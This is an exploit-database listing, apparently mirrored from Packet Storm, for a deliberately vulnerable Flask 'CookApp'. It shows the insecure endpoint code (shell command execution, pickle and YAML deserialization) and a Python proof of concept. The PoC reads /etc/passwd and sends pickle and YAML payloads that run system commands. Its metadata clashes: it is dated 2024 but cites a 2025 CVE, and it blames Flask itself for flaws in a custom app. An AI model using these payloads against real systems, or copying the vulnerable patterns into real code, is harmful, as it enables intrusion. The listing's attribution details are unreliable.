Share
## https://sploitus.com/exploit?id=PACKETSTORM:212501
# Exploit Title: Flask 3.0.0 CookApp - Multiple Unauthenticated RCE
    Vulnerabilities
    # Date: 2024-12-05
    # Exploit Author: nu11secur1ty
    # Vendor Homepage: https://flask.palletsprojects.com/
    # Software Link: https://pypi.org/project/Flask/
    # Version: 3.0.0
    # Tested on: Linux (Ubuntu 22.04), Docker containers
    # CVE: CVE-2025-55182
    # Category: Remote Code Execution
    # Platform: Python/Flask
    
    1. Description
    ==============
    
    A vulnerable Flask application (CookApp) contains multiple critical security
    vulnerabilities that allow unauthenticated remote attackers to execute arbitrary
    commands on the target system.
    
    The application contains three distinct Remote Code Execution (RCE) vectors:
    
    1. Command Injection via `/api/run` endpoint (CWE-78)
    2. Pickle Deserialization RCE via `/api/load` endpoint (CWE-502)
    3. YAML Deserialization RCE via `/api/yaml` endpoint (CWE-502)
    
    CVSS 3.1 Score: 9.8 (CRITICAL)
    Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    
    2. Vulnerable Code
    ==================
    
    ```python
    # Vulnerable endpoint 1: Command Injection
    @app.route("/api/run", methods=["POST"])
    def run_cmd():
        cmd = request.json.get("cmd", "whoami")
        # VULNERABLE: shell=True with user input
        output = subprocess.check_output(cmd, shell=True)
        return {"output": output.decode()}
    
    # Vulnerable endpoint 2: Pickle Deserialization
    @app.route("/api/load", methods=["POST"])
    def load():
        data = request.get_data()
        # VULNERABLE: pickle.loads() with untrusted data
        recipe = pickle.loads(data)
        return {"status": "loaded", "recipe": str(recipe)}
    
    # Vulnerable endpoint 3: YAML Deserialization
    @app.route("/api/yaml", methods=["POST"])
    def import_yaml():
        yaml_data = request.data.decode()
        # VULNERABLE: yaml.load() instead of yaml.safe_load()
        data = yaml.load(yaml_data, Loader=yaml.Loader)
        return {"data": str(data)}
    
    [+]PoC:
    
    ```py
    
    #!/usr/bin/env python3
    # https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/2025/flask-3.0.0-RCE/PoC.py
    # nu11secur1ty
    import requests
    import pickle
    
    target = "http://vulnerable-host:5000"
    
    # 1. Command Injection (simplest)
    resp = requests.post(f"{target}/api/run", json={"cmd": "cat /etc/passwd"})
    print("Command Injection Output:", resp.json().get('output', ''))
    
    # 2. Pickle RCE
    class RCE:
        def __reduce__(self):
            import os
            return (os.system, ("id",))
    
    payload = pickle.dumps(RCE())
    resp = requests.post(f"{target}/api/load", data=payload)
    print("Pickle RCE Status:", resp.status_code)
    
    # 3. YAML RCE
    yaml_payload = """!!python/object/apply:subprocess.Popen
    - ["sh", "-c", "whoami"]"""
    resp = requests.post(f"{target}/api/yaml", data=yaml_payload)
    print("YAML RCE Status:", resp.status_code)
    ```
    ### Demo:
    [href](https://www.patreon.com/posts/flask-3-0-0-rce-145134394)
    
    
    -- 
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstorm.news/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>